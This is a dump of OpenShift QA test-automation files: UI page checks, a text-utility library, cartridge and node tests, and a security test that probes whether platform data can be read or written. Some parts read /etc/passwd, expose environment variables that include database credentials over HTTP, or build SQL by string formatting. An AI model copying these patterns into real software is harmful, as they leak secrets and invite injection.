web.assert_text_equal_by_xpath('Welcome to OpenShift',\n '''/html/body/div[@id='content']/div/div/div/div[3]/div/h1/div[1]''',\n 'Community page is missing')\n\n self.tearDown()\n\n return self.passed(\"CheckHomeContent test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo01)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of CheckHomeContent.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6631290912628174, "alphanum_fraction": 0.6727148294448853, "avg_line_length": 22.360000610351562, "blob_id": "65907a20c13590a378e4826f1227ad234c6f95e2", "content_id": "a08b77450a1b6bdac131dffe2c07834ac8815810", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5842, "license_type": "no_license", "max_line_length": 78, "num_lines": 250, "path": "/automation/open/lib/supports/textutils.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nGeneral text functions. You may import this instead of the stock\n\"string\" module in most cases.\n\n\"\"\"\n\nimport sys\nimport re\nimport binascii\n\nlowercase = 'abcdefghijklmnopqrstuvwxyz'\nuppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\ndigits = '0123456789'\nletters = lowercase + uppercase\nalphanumeric = lowercase + uppercase + digits\nwhitespace = ' \\t\\n\\r\\v\\f'\nCRLF = \"\\r\\n\"\npunctuation = \"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\"\"\"\nprintable = digits + letters + punctuation + whitespace\n\ndef cut_string(s, maxlen=800):\n\t\"\"\"Cuts a long string, returning the head and tail combined, with the\nmiddle missing. \"\"\"\n\tif len(s) <= maxlen:\n\t\treturn s\n\thalflen = (min(maxlen, len(s))/2)-6\n\treturn s[:halflen]+\"[...snip...]\"+s[-halflen:]\nsnip_string = cut_string # alias\n\ndef random_string(size):\n\t\"\"\"Return a string of length <size> with random alphanumeric\ncharacters in it.\"\"\"\n\timport random\n\trng = random.random\n\tlseq = len(alphanumeric)\n\tx = range(size)\n\tfor i in x:\n\t\tx[i] = alphanumeric[int(rng() * lseq)]\n\treturn \"\".join(x)\n\ndef crange(start, fin):\n\t\"\"\"like range(), but for characters.\"\"\"\n\tfor i in xrange(start, fin+1):\n\t\tyield chr(i)\n\ndef maketrans(s, d):\n\t\"\"\"maketrans(frm, to) -> string\n\tReturn a translation table (a string of 256 bytes long). \"\"\"\n\ttbl = range(256) \n\tfor src, dest in zip(s, d):\n\t\ttbl[ord(src)] = ord(dest)\n\treturn \"\".join(map(chr, tbl))\n\ntbl = [\"_\"]*256\nfor c in alphanumeric:\n\ttbl[ord(c)] = c\n_IDENTTABLE = \"\".join(tbl)\ndel tbl, c\n\ndef identifier(tag):\n\t\"\"\"Return a valid Python identifier given an arbitrary string.\"\"\"\n\ttag = str(tag)\n\treturn tag.translate(_IDENTTABLE).capitalize()\n\n# creating a new translation table all the time is annoying. 
This makes a\n# default one automatically.\ndef translate(string, frm, to, table=None, deletechars=None):\n\t\"\"\"Translate a string using table (one will be built if not supplied).\n\tFirst remove 'deletechars' characters from 'string', then translate the\n\t'from' characters to the 'to' characters.\"\"\"\n\ttable = table or maketrans(frm, to)\n\treturn string.translate(table, deletechars)\n\n# text filters follow\ndef grep(patt, *args):\n\t\"\"\"grep(pattern, objects...)\nreturns a list of matches given an object, which should usually be a list of\nstrings, but could be a single string.\t\"\"\"\n\tregex = re.compile(patt)\n\treturn filter(regex.search, _combine(args))\n\ndef cat(*args):\n\t\"\"\"cat(obj...)\nCombines all objects lines into one list.\"\"\"\n\treturn _combine(args)\n\ndef text(*args):\n\t\"\"\"text(object, ...)\nReturns all given objects as a single string.\"\"\"\n\treturn \"\".join(_combine(args))\n\ndef tac(*args):\n\t\"\"\"tac(obj...)\nCombines all objects lines into one list and returns them in reverse order.\"\"\"\n\tl = _combine(args)\n\tl.reverse()\n\treturn l\n\ndef head(*args):\n\t\"\"\"Returns the top 10 lines of the combined objects.\"\"\"\n\trv = [] ; c = 0\n\tfor arg in args:\n\t\tfor item in _tolist(arg):\n\t\t\tif c >= 10:\n\t\t\t\tbreak\n\t\t\trv.append(item)\n\t\t\tc += 1\n\treturn rv\n\ndef tail(*args):\n\t\"\"\"Returns the bottom 10 lines of the combined objects.\"\"\"\n\treturn _combine(args)[-10:]\n\ndef cksum(*args):\n\t\"\"\"cksum(args...)\nReturns the crc32 value of arguments.\"\"\"\n\tcrc = 0\n\tfor arg in args:\n\t\tfor item in _tolist(arg):\n\t\t\tcrc = binascii.crc32(str(item), crc)\n\treturn crc\n\ndef md5sum(*args):\n\t\"Return the MD5 sum of the arguments.\"\n\timport md5\n\tm = md5.new()\n\tfor arg in args:\n\t\tfor item in _tolist(arg):\n\t\t\tm.update(str(item))\n\treturn m.digest()\n\ndef sha1sum(*args):\n\t\"Return the SHA1 sum of the arguments.\"\n\timport sha\n\ts = sha.new()\n\tfor arg in args:\n\t\tfor item in _tolist(arg):\n\t\t\ts.update(str(item))\n\treturn s.digest()\n\ndef sort(*args):\n\t\"\"\"sort - Returns argument list sorted.\"\"\"\n\trv = _combine(args)\n\trv.sort()\n\treturn rv\n\ndef uniq(*args):\n\t\"Unique - returns the unique elements of the objects.\"\n\treturn removedups(_combine(args))\n\ndef wc(*args):\n\t\"Word count - returns a tuple of (lines, words, characters) of the objects.\"\n\tc = w = l = 0\n\tfor line in _combine(args):\n\t\tc += len(line)\n\t\tw += len(line.split())\n\t\tl += 1\n\treturn l, w, c\n\ndef nl(*args):\n\t\"line numbers - prepends line numbers to strings in list.\"\n\trv = []\n\tfor n, s in enumerate(_combine(args)):\n\t\trv.append(\"%6d\t%s\" % (n+1, s))\n\treturn rv\n\ndef cut(obj, chars=None, fields=None, delim=\"\\t\"):\n\t\"\"\"cut(obj, bytes=None, chars=None, fields=None, delim=\"\\t\")\nCut a section from the list of lines. 
arguments are tuples, except delim.\"\"\"\n\trv = []\n\tif chars:\n\t\tfor line in _tolist(obj):\n\t\t\tst, end = chars # a 2-tuple of start and end positions\n\t\t\trv.append(line[st:end])\n\telif fields:\n\t\tfor line in _tolist(obj):\n\t\t\twords = line.split(delim)\n\t\t\twl = []\n\t\t\tfor fn in fields:\n\t\t\t\twl.append(words[fn])\n\t\t\trv.append(tuple(wl))\n\telse:\n\t\traise ValueError, \"cut: you must specify either char range or fields\"\n\treturn rv\n\ndef hexdump(*args):\n\t\"return a hexadecimal string representation of argument lines.\"\n\ts = []\n\tfor line in _combine(args):\n\t\ts.append(binascii.hexlify(line))\n\treturn \"\".join(s)\n\ndef comm(obj1, obj2):\n\traise NotImplementedError\n\ndef csplit(*args):\n\traise NotImplementedError\n\ndef expand(*args):\n\traise NotImplementedError\n\ndef fold(*args):\n\traise NotImplementedError\n\ndef join(*args):\n\traise NotImplementedError\n\ndef od(*args):\n\traise NotImplementedError\n\ndef paste(*args):\n\traise NotImplementedError\n\ndef split(*args):\n\traise NotImplementedError\n\ndef unexpand(*args):\n\traise NotImplementedError\n\n# utility functions\ndef _tolist(obj):\n\t_to = type(obj)\n\tif _to is str:\n\t\treturn [obj]\n\telif issubclass(_to, file) or hasattr(obj, \"readlines\"):\n\t\treturn obj.readlines()\n\telse:\n\t\treturn list(obj)\n\ndef _combine(args):\n\tc = []\n\tfor arg in args:\n\t\tc.extend(_tolist(arg))\n\treturn c\n\n\ndef _test(argv):\n\tprint grep(\"b\", \"abacdefg\")\n\tprint grep(\"x\", \"abacdefg\")\n\tprint cut(file(\"/etc/passwd\"), fields=(0,), delim=\":\")\n\nif __name__ == \"__main__\":\n\timport sys\n\t_test(sys.argv)\n\n\n" }, { "alpha_fraction": 0.5987821221351624, "alphanum_fraction": 0.6112990379333496, "avg_line_length": 33.764705657958984, "blob_id": "8f9179553f2beb203698687ad088fc4ada855110", "content_id": "badf0498f9c6497ae73ba136abc96d5c26642f45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2956, "license_type": "no_license", "max_line_length": 128, "num_lines": 85, "path": "/automation/open/testmodules/RT/security/read_write_libra_important_data_devenv.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nJianlin Liu\[email protected]\nDec 30, 2011\n[security]Security - Write or modify libra important data\nhttps://tcms.engineering.redhat.com/case/122336/?from_plan=4962\n\"\"\"\n\nimport os\nimport sys\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n ITEST=\"DEV\"\n def initialize(self):\n self.summary = \"[security]Security - Write or modify libra important data on devenv instance\"\n self.app_type = common.app_types[\"php\"]\n self.app_name = \"SecurityTestApp\"\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass RWlibraImportantdata(OpenShiftTest):\n def test_method(self):\n self.info(\"Create a %s application\" %(self.app_type))\n ret = common.create_app(self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n \n \n self.assert_equal(ret, 0, \"%s app should be created successfully\" %(self.app_name))\n\n if (self.run_mode in (\"STG\", \"PROD\")):\n file_name1 = \"read_write_libra_important_data_stage.php\"\n file_name2 = \"read_write_libra_important_data_stage.sh\"\n elif (self.run_mode == \"DEV\"):\n file_name1 = \"read_write_libra_important_data_devenv.php\"\n 
file_name2 = \"read_write_libra_important_data_devenv.sh\"\n else:\n raise Exception(\"Unknown run mode\")\n source_file1 = \"%s/data/%s\" %(WORK_DIR, file_name1)\n source_file2 = \"%s/data/%s\" %(WORK_DIR, file_name2)\n target_file1 = \"%s/php/index.php\" %(self.app_name)\n target_file2 = \"%s/php/%s\" %(self.app_name, file_name2)\n self.info(\"Copying test files to app git repo\")\n ret = common.command_get_status(\"cp -f %s %s && cp -f %s %s\" %(source_file1, target_file1, source_file2, target_file2)) \n self.assert_equal(ret, 0,\"File and directories are added to your git repo successfully\")\n\n self.info(\"Do git commit\")\n ret = common.command_get_status(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name))\n self.assert_equal(ret, 0, \"File and directories are added to your git repo successfully\")\n\n\n self.info(\"Get app url\") \n app_url = OSConf.get_app_url(self.app_name)\n\n self.info(\"Access app's URL to tigger test\")\n ret = common.grep_web_page(app_url, \"###RESULT###: PASS\")\n self.assert_equal(ret, 0)\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RWlibraImportantdata)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6227629780769348, "alphanum_fraction": 0.6453689336776733, "avg_line_length": 46.529850006103516, "blob_id": "1ae3f7c17a9e82a69a60ac88d0e16307d9a679fb", "content_id": "96e56c4fb08b29ce5d11aa3619709935dc2b3be1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6370, "license_type": "no_license", "max_line_length": 482, "num_lines": 134, "path": "/automation/open/testmodules/UI/web/case_173928.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_173928.py\n# Date: 2012/08/07 13:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckPricingPageLayout(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n \n #check with invalid password\n web.go_to_home()\n #web.click_element_by_xpath(\"//nav[@id='nav']/div/div/ul/li[4]/a/span\")\n web.click_element_by_xpath(\"//a[@href='/community/developers']\")\n web.click_element_by_xpath(\"//a[@href='/community/developers/pricing']\")\n web.assert_text_equal_by_xpath('''Pricing''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n\n web.assert_text_equal_by_xpath('''Our free Developer Preview version of OpenShift is currently available. We are planning to expand the OpenShift offering to provide users the ability to purchase increased capacity, functionality and support. The details below provide our pricing plans, which may be subject to change as we continue to fine tune the offering to address our customers needs. Sign up for the Developer Preview.''','''//div[@id='node-11187']/div/article/p''')\n \n #check the example part\n web.assert_text_equal_by_xpath('''What's a gear?''','''//div[@id='node-11187']/div/article/section[2]/h2''')\n web.assert_text_equal_by_xpath('''A gear is a resource constrained container that runs one or more user-specified software stacks, also known as cartridges. Each gear has a limited amount of RAM and disk space. 
If an application needs more resources, it can use multiple gears.''','''//div[@id='node-11187']/div/article/section[2]/div/div/p''')\n web.assert_text_equal_by_xpath('''Gears come in multiple sizes to suit the needs of various software stacks.''','''//div[@id='node-11187']/div/article/section[2]/div/div/p[2]''')\n web.assert_text_equal_by_xpath('''Let's look at an example app running on OpenShift''','''//div[@id='node-11187']/div/article/section[2]/h3''')\n web.assert_text_equal_by_xpath('''We can estimate the needs and costs of the app at different stages.''','''//div[@id='node-11187']/div/article/section[2]/p''')\n web.assert_text_equal_by_xpath('''Drupal-based Site''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div/h3''')\n web.assert_text_equal_by_xpath('''Standard Drupal 7 install with normal caching, mostly anonymous traffic, and a 2% update rate.''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div/p''')\n web.assert_text_equal_by_xpath('''Estimated costs assume the maximum number of gears running continuously, and include the platform fee where applicable but no add-ons.''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div/p[2]''')\n web.assert_text_equal_by_xpath('''Just starting up''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div[2]/h3''')\n web.assert_text_equal_by_xpath('''Pretty popular''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div[3]/h3''')\n web.assert_text_equal_by_xpath('''Making it Big''','''//div[@id='node-11187']/div/article/section[2]/div[2]/div[4]/h3''')\n\n #check the FAQ part\n web.click_element_by_link_text('''What is the current status of OpenShift?''')\n time.sleep(2)\n web.check_title(\"What is the current status of OpenShift? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''What is Red Hat's plan with respect to OpenShift pricing?''')\n time.sleep(2)\n web.check_title(\"What is Red Hat's plan with respect to OpenShift pricing? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''Are there different Gear sizes and how much do they cost?''')\n time.sleep(2)\n web.check_title(\"Are there different gear sizes and how much do they cost? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''What are scaling threshold settings?''')\n time.sleep(2)\n web.check_title(\"What are scaling threshold settings? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''Do you offer support?''')\n time.sleep(2)\n web.check_title(\"Do you offer support? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''What is Add On Storage?''')\n time.sleep(2)\n web.check_title(\"What is Add On Storage? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''What will happen to the free resources that were offered during the Developer Preview phase?''')\n time.sleep(2)\n web.check_title(\"What will happen to the free resources that were offered during the Developer Preview phase? | OpenShift by Red Hat\")\n web.go_back()\n time.sleep(2)\n\n web.click_element_by_link_text('''How do I get SSL for my domains?''')\n time.sleep(2)\n web.check_title(\"How do I get SSL for my domains? 
| OpenShift by Red Hat\")\n        web.go_back()\n        time.sleep(2)\n\n        web.click_element_by_link_text('''What is included with Java EE6 Full Profile & CDI?''')\n        time.sleep(2)\n        web.check_title(\"What is included with Java EE6 Full Profile & CDI? | OpenShift by Red Hat\")\n        web.go_back()\n        time.sleep(2)\n\n        web.click_element_by_link_text('''OpenShift FAQ''')\n        time.sleep(2)\n        web.check_title(\"Frequently Asked Questions | OpenShift by Red Hat\") \n        web.go_back()\n        time.sleep(2)\n\n        self.tearDown()\n\n        return self.passed(\" case_173928--CheckPricingPageLayout passed successfully.\")\n\n\n    def tearDown(self):\n        self.config.web.driver.quit()\n        self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(CheckPricingPageLayout)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of case_173928.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6168072819709778, "alphanum_fraction": 0.6239454746246338, "avg_line_length": 35.25882339477539, "blob_id": "1b7189122b1d8aace34e4948c5076e6bcacb2b5a", "content_id": "65fcc3606069c04418ba5f8098a866790eca2eda", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3082, "license_type": "no_license", "max_line_length": 255, "num_lines": 85, "path": "/automation/open/testmodules/RT/client/data/snapshot_restore_mysql_data/application.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nimport MySQLdb\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n    execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n    pass\n\ndef create_data(speaker_val, title_val):\n    content=\"Welcome~\\n\"\n    try:\n        con=MySQLdb.connect(host=os.environ['OPENSHIFT_MYSQL_DB_HOST'], user=os.environ['OPENSHIFT_MYSQL_DB_USERNAME'], passwd=os.environ['OPENSHIFT_MYSQL_DB_PASSWORD'], db=os.environ['OPENSHIFT_APP_NAME'], port=int(os.environ['OPENSHIFT_MYSQL_DB_PORT']))\n        cursor = con.cursor()\n        cursor.execute(\"DROP TABLE IF EXISTS ucctalk\")\n        cursor.execute(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n        cursor.execute(\"INSERT INTO ucctalk (speaker,title) VALUES ('%s', '%s')\" %(speaker_val, title_val))\n        cursor.execute(\"SELECT * FROM ucctalk\")\n        alldata = cursor.fetchall()\n        if alldata:\n            for rec in alldata:\n                content+=rec[0]+\", \"+rec[1]+\"\\n\"\n        cursor.close()\n        con.commit()\n        con.close()\n    except Exception, e:\n        content = str(e)\n    return content\n\ndef show_data():\n    content=\"Welcome~\\n\"\n    try:\n        con=MySQLdb.connect(host=os.environ['OPENSHIFT_MYSQL_DB_HOST'], user=os.environ['OPENSHIFT_MYSQL_DB_USERNAME'], passwd=os.environ['OPENSHIFT_MYSQL_DB_PASSWORD'], db=os.environ['OPENSHIFT_APP_NAME'], port=int(os.environ['OPENSHIFT_MYSQL_DB_PORT']))\n        cursor = con.cursor()\n        cursor.execute(\"SELECT * FROM ucctalk\")\n        alldata = cursor.fetchall()\n        if alldata:\n            for rec in alldata:\n                content+=rec[0]+\", \"+rec[1]+\"\\n\"\n        cursor.close()\n        con.commit()\n        con.close()\n    except Exception, e:\n        content = str(e)\n    return content\n\n\ndef application(environ, start_response):\n\tctype = 'text/plain'\n\n\ttarget_file = \"%swsgi_data_test\" %(os.environ['OPENSHIFT_DATA_DIR'])\n\n\tif environ['PATH_INFO'] == '/health':\n\t\tresponse_body = \"1\"\n\telif environ['PATH_INFO'] == '/env':\n\t\tresponse_body = ['%s: %s' % (key, value)\n                    for key, value in sorted(environ.items())]\n\t\tresponse_body = '\\n'.join(response_body)\n\telif environ['PATH_INFO'] == '/create':\n\t\tresponse_body = create_data(\"speaker1\",\"title1\")\n\telif environ['PATH_INFO'] == '/modify':\n\t\tresponse_body = create_data(\"speaker2\",\"title2\")\n\telif environ['PATH_INFO'] == '/show':\n\t\tresponse_body = show_data()\n\telse:\n\t\tresponse_body = 'Welcome to OpenShift'\n\n\tstatus = '200 OK'\n\tresponse_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n\t#\n\tstart_response(status, response_headers)\n\treturn [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n\tfrom wsgiref.simple_server import make_server\n\thttpd = make_server('localhost', 8051, application)\n\t# Wait for a single request, serve it and quit.\n\thttpd.handle_request()\n" }, { "alpha_fraction": 0.6052929162979126, "alphanum_fraction": 0.6168287992477417, "avg_line_length": 34.764705657958984, "blob_id": "58eb55f000fec0890b83e23b999431df02846487", "content_id": "f2173a125641bdbae3c07b5e9a1042b10511f009", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4421, "license_type": "no_license", "max_line_length": 374, "num_lines": 124, "path": "/automation/open/testmodules/RT/cartridge/override_jboss_server_modules.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1114][rhc-cartridge] Override jbossas-7 server modules with user's modules\nhttps://tcms.engineering.redhat.com/case/122350/\n\"\"\"\nimport os,sys,re,time\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.summary = \"[US1114][rhc-cartridge] Override jbossas-7 server modules with user's modules \" \n        self.app_name = \"overridejboss\"\n        self.app_type = common.app_types[\"jbossas\"]\n        self.git_repo = \"./%s\" % (self.app_name)\n\n        common.env_setup()\n        common.clean_up(self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n\n        self.steps_list = []\n\n    def finalize(self):\n        os.system(\"rm -rf %s\"%(self.app_name))\n\nclass OverrideJbossServerModules(OpenShiftTest):\n    def test_method(self):\n\n        # 1. 
Create an jbossas app: %s\" % (self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Create some directories and copy jboss modules into them\n cmd = \"mkdir -p %s/.openshift/config/modules/org/joda/time/main/ && cp %s/app_template/jodatime/{JodaTime.jar,module.xml} %s/.openshift/config/modules/org/joda/time/main/ && mkdir %s/src/main/webapp/WEB-INF/lib && cp %s/app_template/jodatime/test1.jar %s/src/main/webapp/WEB-INF/lib\" % (self.git_repo, WORK_DIR, self.git_repo, self.git_repo, WORK_DIR, self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\"2.Create some directories and copy jboss modules into them\",\n cmd,\n expect_description=\"Copy should succeed\",\n expect_return=0))\n\n # 3.Create time.jsp in the git repo\n time_jsp = \"\"\"<HTML>\n<HEAD>\n <TITLE>JBossAS7 Custom Modules Test Page</TITLE>\n <%@ page import=\"org.joda.time.DateTime\" %>\n <%@ page import=\"java.util.*\" %>\n</HEAD>\n<BODY>\n<h1>Customized org.joda.time.DateTime</h1>\n<pre>\n<%\nDateTime dt = new DateTime();\n%>\n<%= dt %>\n</pre>\n<h1>java.util.Date</h1>\n<pre>\n<%\nDate dt1 = new Date();\n%>\n<%= dt1 %>\n</pre>\n</BODY>\n</HTML>\"\"\"\n file_path = \"%s/src/main/webapp/time.jsp\" % (self.git_repo)\n cmd = \"echo '%s' > %s\" % (time_jsp, file_path)\n self.steps_list.append( testcase.TestCaseStep(\"3.Create time.jsp in the git repo\",\n cmd,\n expect_description=\"time.jsp should be created successfully\",\n expect_return=0))\n\n # 4.Git push all the changes\n self.steps_list.append( testcase.TestCaseStep(\"4.Git push all the changes\",\n \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"time.jsp should be created successfully\",\n expect_return=0))\n\n # 5.Check time.jsp\n def get_app_url(app_name):\n def get_app_url2():\n return OSConf.get_app_url(self.app_name) + \"/time.jsp\"\n return get_app_url2\n\n self.steps_list.append( testcase.TestCaseStep(\"5.Check time.jsp\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name), \"Customized org.joda.time.DateTime\", \"-H 'Pragma: no-cache'\", 3, 6],\n expect_description=\"time.jsp should be able to work properly\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(OverrideJbossServerModules)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5334996581077576, "alphanum_fraction": 0.5443692207336426, "avg_line_length": 39.07143020629883, "blob_id": "2d28b0a43a34ac35efa97068e58318ba6b6c01b4", "content_id": "15d7d40d35d6d0b42c6d6960cb7c9d0700505347", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5612, "license_type": "no_license", "max_line_length": 154, "num_lines": 140, "path": "/automation/open/testmodules/RT/node/facter_active_app.py", "repo_name": 
"fdumpling/practices", "src_encoding": "UTF-8", "text": "\n#\n# File name: facter_active_app.py\n# Date: 2012/02/24 05:04\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport re\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = 'DEV'\n\n def initialize(self):\n self.summary = \"[rhc-node] [US1734] New metric for facter reporting about the active applications on the current node\"\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n tcms_testcase_id = 130874\n self.steps= []\n if self.get_run_mode() == \"OnPremise\":\n self.origin_max_apps = 1000\n else:\n self.origin_max_apps = 80\n\n common.env_setup()\n\n\n def finalize(self):\n common.run_remote_cmd(None,\"sed -i s'/max_active_apps=.*/max_active_apps=%d/' /etc/openshift/resource_limits.conf\" % (self.origin_max_apps), True)\n\nclass FacterActiveApp(OpenShiftTest):\n def test_method(self):\n max_apps = 3\n destroy_apps = int(max_apps/2)\n #1) In the file '/etc/openshift/resource_limits.conf' change the value 'max_apps' to <max_apps>, change the value 'max_active_apps' to <max_apps>\n #common.run_remote_cmd(None,\"sed -i s'/max_apps=.*/max_apps=%d/' /etc/openshift/resource_limits.conf\" % (max_apps), as_root=True)\n #common.run_remote_cmd(None,\"sed -i s'/max_active_apps=.*/max_active_apps=%d/' /etc/openshift/resource_limits.conf\" % (max_apps), as_root=True)\n self.steps.append(testcase.TestCaseStep(\"Change the value of max_apps\",\n common.run_remote_cmd,\n function_parameters = [None,\"sed -i s'/max_active_apps=.*/max_active_apps=%d/' /etc/openshift/resource_limits.conf\" % (max_apps), True]))\n\n #2) Create <max_apps> applications\n for i in range(max_apps):\n self.steps.append(testcase.TestCaseStep(\"Create app#%d\"%i ,\n common.create_app,\n function_parameters=[self.app_name+\"%d\"%i, \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, False],\n expect_return=0))\n\n def verify_facter(percent):\n (status, output) = common.run_remote_cmd(None, 'facter active_capacity', True)\n if status!=0:\n return 1\n obj = re.search(r\"^%s\"%percent, output)\n if obj:\n return 0\n return 1\n\n self.steps.append(testcase.TestCaseStep(\"Verify the facter active_capacity\" ,\n verify_facter,\n function_parameters=[100],\n expect_description = \"Should be active_capacity => 100%\",\n expect_return=0))\n #3) Destroy <destroy_apps> application\n for i in range(destroy_apps):\n self.steps.append(testcase.TestCaseStep(\"Destroy app#%d\"%i ,\n common.destroy_app,\n function_parameters=[self.app_name+\"%d\"%i, \n self.user_email, \n self.user_passwd, True],\n expect_return=0))\n\n expect_capacity = int(float(max_apps - destroy_apps) / (max_apps) * 100)\n self.steps.append(testcase.TestCaseStep(\"Verify the facter active_capacity\" ,\n verify_facter,\n function_parameters=[expect_capacity],\n expect_description = \"Should be capacity => %d%%\" % (expect_capacity),\n expect_return=0))\n\n #4) Create <destroy_apps> new applications\n for i in range(destroy_apps):\n self.steps.append(testcase.TestCaseStep(\"Create app#%d\"%i ,\n common.create_app,\n function_parameters=[self.app_name+\"%d\"%i, \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, False],\n expect_return=0,\n try_count=3,\n try_interval=20))\n\n #5) Create an additional application\n 
